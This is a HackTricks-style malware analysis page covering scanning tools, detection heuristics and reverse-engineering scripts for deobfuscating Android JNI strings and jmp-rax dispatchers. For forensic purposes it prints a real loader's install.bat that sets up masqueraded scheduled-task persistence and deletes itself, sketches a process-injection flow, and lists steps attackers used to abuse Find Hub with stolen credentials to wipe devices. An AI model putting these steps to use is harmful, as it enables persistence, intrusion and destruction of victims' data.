Malware Analysis

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Forensics CheatSheets

https://www.jaiminton.com/cheatsheet/DFIR/#

Online Services

Offline Antivirus and Detection Tools

Yara

Install

sudo apt-get install -y yara

Prepare rules

Use this script to download and merge all the yara malware rules from github: https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9
Create the rules directory and execute it. This will create a file called malware_rules.yar which contains all the yara rules for malware.

wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py
mkdir rules
python malware_yara_rules.py

Scan

yara -w malware_rules.yar image  #Scan 1 file
yara -w malware_rules.yar folder #Scan the whole folder

YaraGen: Check for malware and Create rules

You can use the tool YaraGen to generate yara rules from a binary. Check out these tutorials: Part 1, Part 2, Part 3

 python3 yarGen.py --update
 python3.exe yarGen.py --excludegood -m  ../../mals/

ClamAV

Install

sudo apt-get install -y clamav

Scan

sudo freshclam      #Update rules
clamscan filepath   #Scan 1 file
clamscan folderpath #Scan the whole folder

Capa

Capa detects potentially malicious capabilities in executables: PE, ELF, .NET. So it will find things such as Att&ck tactics, or suspicious capabilities such as:

  • check for OutputDebugString error
  • run as a service
  • create process

Get it int he Github repo.

IOCs

IOC means Indicator Of Compromise. An IOC is a set of conditions that identify some potentially unwanted software or confirmed malware. Blue Teams use this kind of definition to search for this kind of malicious files in their systems and networks.
To share these definitions is very useful as when malware is identified in a computer and an IOC for that malware is created, other Blue Teams can use it to identify the malware faster.

A tool to create or modify IOCs is IOC Editor.
You can use tools such as Redline to search for defined IOCs in a device.

Loki

Loki is a scanner for Simple Indicators of Compromise.
Detection is based on four detection methods:

1. File Name IOC
   Regex match on full file path/name

2. Yara Rule Check
   Yara signature matches on file data and process memory

3. Hash Check
   Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files

4. C2 Back Connect Check
   Compares process connection endpoints with C2 IOCs (new since version v.10)

Linux Malware Detect

Linux Malware Detect (LMD) is a malware scanner for Linux released under the GNU GPLv2 license, that is designed around the threats faced in shared hosted environments. It uses threat data from network edge intrusion detection systems to extract malware that is actively being used in attacks and generates signatures for detection. In addition, threat data is also derived from user submissions with the LMD checkout feature and malware community resources.

rkhunter

Tools like rkhunter can be used to check the filesystem for possible rootkits and malware.

sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress]

FLOSS

FLOSS is a tool that will try to find obfuscated strings inside executables using different techniques.

PEpper

PEpper checks some basic stuff inside the executable (binary data, entropy, URLs and IPs, some yara rules).

PEstudio

PEstudio is a tool that allows to get information of Windows executables such as imports, exports, headers, but also will check virus total and find potential Att&ck techniques.

Detect It Easy(DiE)

DiE is a tool to detect if a file is encrypted and also find packers.

NeoPI

NeoPI is a Python script that uses a variety of statistical methods to detect obfuscated and encrypted content within text/script files. The intended purpose of NeoPI is to aid in the detection of hidden web shell code.

php-malware-finder

PHP-malware-finder does its very best to detect obfuscated/dodgy code as well as files using PHP functions often used in malwares/webshells.

Apple Binary Signatures

When checking some malware sample you should always check the signature of the binary as the developer that signed it may be already related with malware.

#Get signer
codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier"

#Check if the app’s contents have been modified
codesign --verify --verbose /Applications/Safari.app

#Check if the signature is valid
spctl --assess --verbose /Applications/Safari.app

Detection Techniques

File Stacking

If you know that some folder containing the files of a web server was last updated on some date. Check the date all the files in the web server were created and modified and if any date is suspicious, check that file.

Baselines

If the files of a folder shouldn’t have been modified, you can calculate the hash of the original files of the folder and compare them with the current ones. Anything modified will be suspicious.

Statistical Analysis

When the information is saved in logs you can check statistics like how many times each file of a web server was accessed as a web shell might be one of the most.


Android in-app native telemetry (no root)

On Android, you can instrument native code inside the target app process by preloading a tiny logger library before other JNI libs initialize. This gives early visibility into native behavior without system-wide hooks or root. A popular approach is SoTap: drop libsotap.so for the right ABI into the APK and inject a System.loadLibrary(“sotap”) call early (e.g., static initializer or Application.onCreate), then collect logs from internal/external paths or Logcat fallback.

See the Android native reversing page for setup details and log paths:

Reversing Native Libraries


Android/JNI native string deobfuscation with angr + Ghidra

Some Android malware and RASP-protected apps hide JNI method names and signatures by decoding them at runtime before calling RegisterNatives. When Frida/ptrace instrumentation is killed by anti-debug, you can still recover the plaintext offline by executing the in-binary decoder with angr and then pushing results back into Ghidra as comments.

Key idea: treat the decoder inside the .so as a callable function, execute it on the obfuscated byte blobs in .rodata, and concretize the output bytes up to the first \x00 (C-string terminator). Keep angr and Ghidra using the same image base to avoid address mismatches.

Workflow overview

  • Triage in Ghidra: identify the decoder and its calling convention/arguments in JNI_OnLoad and RegisterNatives setup.
  • Run angr (CPython3) to execute the decoder for each target string and dump results.
  • Annotate in Ghidra: auto-comment decoded strings at each call site for fast JNI reconstruction.

Ghidra triage (JNI_OnLoad pattern)

  • Apply JNI datatypes to JNI_OnLoad so Ghidra recognises JNINativeMethod structures.

  • Typical JNINativeMethod per Oracle docs:

    typedef struct {
        char *name;      // e.g., "nativeFoo"
        char *signature; // e.g., "()V", "()[B"
        void *fnPtr;     // native implementation address
    } JNINativeMethod;
    
  • Look for calls to RegisterNatives. If the library constructs the name/signature with a local routine (e.g., FUN_00100e10) that references a static byte table (e.g., DAT_00100bf4) and takes parameters like (encoded_ptr, out_buf, length), that is an ideal target for offline execution.

angr setup (execute the decoder offline)

  • Load the .so with the same base used in Ghidra (example: 0x00100000) and disable auto-loading of external libs to keep the state small.
angr setup and offline decoder execution
import angr, json

project = angr.Project(
    '/path/to/libtarget.so',
    load_options={'main_opts': {'base_addr': 0x00100000}},
    auto_load_libs=False,
)

ENCODING_FUNC_ADDR = 0x00100e10  # decoder function discovered in Ghidra

def decode_string(enc_addr, length):
    # fresh blank state per evaluation
    st = project.factory.blank_state()
    outbuf = st.heap.allocate(length)
    call = project.factory.callable(ENCODING_FUNC_ADDR, base_state=st)
    ret_ptr = call(enc_addr, outbuf, length)  # returns outbuf pointer
    rs = call.result_state
    raw = rs.solver.eval(rs.memory.load(ret_ptr, length), cast_to=bytes)
    return raw.split(b'\x00', 1)[0].decode('utf-8', errors='ignore')

# Example: decode a JNI signature at 0x100933 of length 5 → should be ()[B
print(decode_string(0x00100933, 5))
  • At scale, build a static map of call sites to the decoder’s arguments (encoded_ptr, size). Wrappers may hide arguments, so you may create this mapping manually from Ghidra xrefs if API recovery is noisy.
Batch decode multiple call sites with angr
# call_site -> (encoded_addr, size)
call_site_args_map = {
    0x00100f8c: (0x00100b81, 0x41),
    0x00100fa8: (0x00100bca, 0x04),
    0x00100fcc: (0x001007a0, 0x41),
    0x00100fe8: (0x00100933, 0x05),
    0x0010100c: (0x00100c62, 0x41),
    0x00101028: (0x00100c15, 0x16),
    0x00101050: (0x00100a49, 0x101),
    0x00100cf4: (0x00100821, 0x11),
    0x00101170: (0x00100940, 0x101),
    0x001011cc: (0x0010084e, 0x13),
    0x00101334: (0x001007e9, 0x0f),
    0x00101478: (0x0010087d, 0x15),
    0x001014f8: (0x00100800, 0x19),
    0x001015e8: (0x001008e6, 0x27),
    0x0010160c: (0x00100c33, 0x13),
}

decoded_map = { hex(cs): decode_string(enc, sz)
                for cs, (enc, sz) in call_site_args_map.items() }

import json
print(json.dumps(decoded_map, indent=2))
with open('decoded_strings.json', 'w') as f:
    json.dump(decoded_map, f, indent=2)

Annotate call sites in Ghidra Option A: Jython-only comment writer (use a pre-computed JSON)

  • Since angr requires CPython3, keep deobfuscation and annotation separated. First run the angr script above to produce decoded_strings.json. Then run this Jython GhidraScript to write PRE_COMMENTs at each call site (and include the caller function name for context):
Ghidra Jython script to annotate decoded JNI strings
#@category Android/Deobfuscation
# Jython in Ghidra 10/11
import json
from ghidra.program.model.listing import CodeUnit

# Ask for the JSON produced by the angr script
f = askFile('Select decoded_strings.json', 'Load')
mapping = json.load(open(f.absolutePath, 'r'))  # keys as hex strings

fm = currentProgram.getFunctionManager()
rm = currentProgram.getReferenceManager()

# Replace with your decoder address to locate call-xrefs (optional)
ENCODING_FUNC_ADDR = 0x00100e10
enc_addr = toAddr(ENCODING_FUNC_ADDR)

callsite_to_fn = {}
for ref in rm.getReferencesTo(enc_addr):
    if ref.getReferenceType().isCall():
        from_addr = ref.getFromAddress()
        fn = fm.getFunctionContaining(from_addr)
        if fn:
            callsite_to_fn[from_addr.getOffset()] = fn.getName()

# Write comments from JSON
for k_hex, s in mapping.items():
    cs = int(k_hex, 16)
    site = toAddr(cs)
    caller = callsite_to_fn.get(cs, None)
    text = s if caller is None else '%s @ %s' % (s, caller)
    currentProgram.getListing().setComment(site, CodeUnit.PRE_COMMENT, text)
print('[+] Annotated %d call sites' % len(mapping))

Option B: Single CPython script via pyhidra/ghidra_bridge

  • Alternatively, use pyhidra or ghidra_bridge to drive Ghidra’s API from the same CPython process running angr. This allows calling decode_string() and immediately setting PRE_COMMENTs without an intermediate file. The logic mirrors the Jython script: build callsite→function map via ReferenceManager, decode with angr, and set comments.

Why this works and when to use it

  • Offline execution sidesteps RASP/anti-debug: no ptrace, no Frida hooks required to recover strings.
  • Keeping Ghidra and angr base_addr aligned (e.g., 0x00100000) ensures that function/data addresses match across tools.
  • Repeatable recipe for decoders: treat the transform as a pure function, allocate an output buffer in a fresh state, call it with (encoded_ptr, out_ptr, len), then concretize via state.solver.eval and parse C-strings up to \x00.

Notes and pitfalls

  • Respect the target ABI/calling convention. angr.factory.callable picks one based on arch; if arguments look shifted, specify cc explicitly.
  • If the decoder expects zeroed output buffers, initialize outbuf with zeros in the state before the call.
  • For position-independent Android .so, always supply base_addr so addresses in angr match those seen in Ghidra.
  • Use currentProgram.getReferenceManager() to enumerate call-xrefs even if the app wraps the decoder behind thin stubs.

For angr basics, see: angr basics


Deobfuscating Dynamic Control-Flow (JMP/CALL RAX Dispatchers)

Modern malware families heavily abuse Control-Flow Graph (CFG) obfuscation: instead of a direct jump/call they compute the destination at run-time and execute a jmp rax or call rax. A small dispatcher (typically nine instructions) sets the final target depending on the CPU ZF/CF flags, completely breaking static CFG recovery.

The technique – showcased by the SLOW#TEMPEST loader – can be defeated with a three-step workflow that only relies on IDAPython and the Unicorn CPU emulator.

1. Locate every indirect jump / call

import idautils, idc

for ea in idautils.FunctionItems(idc.here()):
    mnem = idc.print_insn_mnem(ea)
    if mnem in ("jmp", "call") and idc.print_operand(ea, 0) == "rax":
        print(f"[+] Dispatcher found @ {ea:X}")

2. Extract the dispatcher byte-code

import idc

def get_dispatcher_start(jmp_ea, count=9):
    s = jmp_ea
    for _ in range(count):
        s = idc.prev_head(s, 0)
    return s

start = get_dispatcher_start(jmp_ea)
size  = jmp_ea + idc.get_item_size(jmp_ea) - start
code  = idc.get_bytes(start, size)
open(f"{start:X}.bin", "wb").write(code)

3. Emulate it twice with Unicorn

from unicorn import *
from unicorn.x86_const import *
import struct

def run(code, zf=0, cf=0):
    BASE = 0x1000
    mu = Uc(UC_ARCH_X86, UC_MODE_64)
    mu.mem_map(BASE, 0x1000)
    mu.mem_write(BASE, code)
    mu.reg_write(UC_X86_REG_RFLAGS, (zf << 6) | cf)
    mu.reg_write(UC_X86_REG_RAX, 0)
    mu.emu_start(BASE, BASE+len(code))
    return mu.reg_read(UC_X86_REG_RAX)

Run run(code,0,0) and run(code,1,1) to obtain the false and true branch targets.

4. Patch back a direct jump / call

import struct, ida_bytes

def patch_direct(ea, target, is_call=False):
    op   = 0xE8 if is_call else 0xE9           # CALL rel32 or JMP rel32
    disp = target - (ea + 5) & 0xFFFFFFFF
    ida_bytes.patch_bytes(ea, bytes([op]) + struct.pack('<I', disp))

After patching, force IDA to re-analyse the function so the full CFG and Hex-Rays output are restored:

import ida_auto, idaapi
idaapi.reanalyze_function(idc.get_func_attr(ea, idc.FUNCATTR_START))

5. Label indirect API calls

Once the real destination of every call rax is known you can tell IDA what it is so parameter types & variable names are recovered automatically:

idc.set_callee_name(call_ea, resolved_addr, 0)  # IDA 8.3+

Practical benefits

  • Restores the real CFG → decompilation goes from 10 lines to thousands.
  • Enables string-cross-reference & xrefs, making behaviour reconstruction trivial.
  • Scripts are reusable: drop them into any loader protected by the same trick.

AutoIt-based loaders: .a3x decryption, Task Scheduler masquerade and RAT injection

This intrusion pattern chains a signed MSI, AutoIt loaders compiled to .a3x, and a Task Scheduler job masquerading as a benign app.

MSI → custom actions → AutoIt orchestrator

Process tree and commands executed by the MSI custom actions:

  • MsiExec.exe → cmd.exe to run install.bat
  • WScript.exe to show a decoy error dialog
%SystemRoot%\system32\cmd.exe /c %APPDATA%\스트레스 클리어\install.bat
%SystemRoot%\System32\WScript.exe %APPDATA%\스트레스 클리어\error.vbs

install.bat (drops loader, sets persistence, self-cleans):

@echo off
set dr=Music

copy "%~dp0AutoIt3.exe" %public%\%dr%\AutoIt3.exe
copy "%~dp0IoKlTr.au3" %public%\%dr%\IoKlTr.au3

cd /d %public%\%dr% & copy c:\windows\system32\schtasks.exe hwpviewer.exe ^
  & hwpviewer /delete /tn "IoKlTr" /f ^
  & hwpviewer /create /sc minute /mo 1 /tn "IoKlTr" /tr "%public%\%dr%\AutoIt3.exe %public%\%dr%\IoKlTr.au3"

del /f /q "%~dp0AutoIt3.exe"
del /f /q "%~dp0IoKlTr.au3"
del /f /q "%~f0"

error.vbs (user decoy):

MsgBox "현재 시스템 언어팩과 프로그램 언어팩이 호환되지 않아 실행할 수 없습니다." & vbCrLf & _
    "설정에서 한국어(대한민국) 언어팩을 설치하거나 변경한 뒤 다시 실행해 주세요.", _
    vbCritical, "언어팩 오류"

Key artifacts and masquerade:

  • Drops AutoIt3.exe and IoKlTr.au3 to C:\Users\Public\Music
  • Copies schtasks.exe to hwpviewer.exe (masquerades as Hangul Word Processor viewer)
  • Creates a scheduled task “IoKlTr” that runs every 1 minute
  • Startup LNK seen as Smart_Web.lnk; mutex: Global\AB732E15-D8DD-87A1-7464-CE6698819E701
  • Stages modules under %APPDATA%\Google\Browser\ subfolders containing adb or adv and starts them via autoit.vbs/install.bat helpers

Forensic triage tips:

  • schtasks enumeration: schtasks /query /fo LIST /v | findstr /i "IoKlTr hwpviewer"
  • Look for renamed copies of schtasks.exe co-located with Task XML: dir /a "C:\Users\Public\Music\hwpviewer.exe"
  • Common paths: C:\Users\Public\Music\AutoIt3.exe, ...\IoKlTr.au3, Startup Smart_Web.lnk, %APPDATA%\Google\Browser\(adb|adv)*
  • Correlate process creation: AutoIt3.exe spawning legitimate Windows binaries (e.g., cleanmgr.exe, hncfinder.exe)

AutoIt loaders and .a3x payload decryption → injection

  • AutoIt modules are compiled with #AutoIt3Wrapper_Outfile_type=a3x and decrypt embedded payloads before injecting into benign processes.
  • Observed families: QuasarRAT (injected into hncfinder.exe) and RftRAT/RFTServer (injected into cleanmgr.exe), as well as RemcosRAT modules (Remcos\RunBinary.a3x).
  • Decryption pattern: derive an AES key via HMAC, decrypt the embedded blob, then inject the plaintext module.

Generic decryption skeleton (exact HMAC input/algorithm is family-specific):

import hmac, hashlib
from Crypto.Cipher import AES

def derive_aes_key(secret: bytes, data: bytes) -> bytes:
    # Example: HMAC-SHA256 → first 16/32 bytes as AES key
    return hmac.new(secret, data, hashlib.sha256).digest()

def aes_decrypt_cbc(key: bytes, iv: bytes, ct: bytes) -> bytes:
    return AES.new(key, AES.MODE_CBC, iv=iv).decrypt(ct)

Common injection flow (CreateRemoteThread-style):

  • CreateProcess (suspended) of the target host (e.g., cleanmgr.exe)
  • VirtualAllocEx + WriteProcessMemory with decrypted module/shellcode
  • CreateRemoteThread or QueueUserAPC to execute payload

Hunting ideas

  • AutoIt3.exe parented by MsiExec.exe or WScript.exe spawning system utilities
  • Files with .a3x extensions or AutoIt script runners under public/user-writable paths
  • Suspicious scheduled tasks executing AutoIt3.exe or binaries not signed by Microsoft, with minute-level triggers

Account-takeover abuse of Android Find My Device (Find Hub)

During the Windows intrusion, operators used stolen Google credentials to repeatedly wipe the victim’s Android devices, suppressing notifications while they expanded access via the victim’s logged-in desktop messenger.

Operator steps (from a logged-in browser session):

  • Review Google Account → Security → Your devices; follow Find My Phone → Find Hub (https://www.google.com/android/find)
  • Select device → re-enter Google password → issue “Erase device” (factory reset); repeat to delay recovery
  • Optional: clear alert e-mails in the linked mailbox (e.g., Naver) to hide security notifications

AdaptixC2: Configuration Extraction and TTPs

See the dedicated page:

Adaptixc2 Config Extraction And Ttps

References

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks